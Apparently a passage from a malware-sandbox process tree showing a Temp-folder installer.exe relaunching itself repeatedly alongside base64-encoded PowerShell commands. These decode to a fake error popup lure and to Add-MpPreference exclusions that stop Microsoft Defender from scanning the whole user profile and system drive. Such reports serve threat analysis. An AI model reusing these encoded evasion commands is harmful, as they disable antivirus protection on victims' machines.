        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        146⤵
        System Location Discovery: System Language Discovery
        
        PID:9500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        146⤵
        
        PID:9408
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        146⤵
        
        PID:9368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        147⤵
        
        PID:9604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        147⤵
        
        PID:9032
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        147⤵
        
        PID:9924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        148⤵
        
        PID:8212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        148⤵
        
        PID:10008
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        148⤵
        
        PID:9296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        149⤵
        
        PID:10048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        149⤵
        
        PID:9756
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        149⤵
        
        PID:9456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        150⤵
        System Location Discovery: System Language Discovery
        
        PID:9640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        150⤵
        
        PID:9760
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        150⤵
        
        PID:9532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        151⤵
        
        PID:9948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        151⤵
        System Location Discovery: System Language Discovery
        
        PID:9360
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        151⤵
        
        PID:9592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        152⤵
        
        PID:10072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        152⤵
        
        PID:10084
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        152⤵
        
        PID:10204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        153⤵
        
        PID:10148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        153⤵
        
        PID:9300
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        153⤵
        System Location Discovery: System Language Discovery
        
        PID:9804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        154⤵
        
        PID:10080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        154⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        154⤵
        
        PID:9160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        155⤵
        
        PID:8972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        155⤵
        
        PID:10352
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        155⤵
        
        PID:10544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        156⤵
        
        PID:10600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        156⤵
        
        PID:10624
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        156⤵
        
        PID:10652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        157⤵
        
        PID:10684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        157⤵
        
        PID:10708
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        157⤵
        
        PID:10776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        158⤵
        
        PID:10896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        158⤵
        
        PID:10940
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        158⤵
        
        PID:11020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        159⤵
        System Location Discovery: System Language Discovery
        
        PID:11052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        159⤵
        
        PID:11124
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        159⤵
        
        PID:11176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        160⤵
        
        PID:11244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        160⤵
        System Location Discovery: System Language Discovery
        
        PID:9408
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        160⤵
        
        PID:10364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        161⤵
        
        PID:10396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
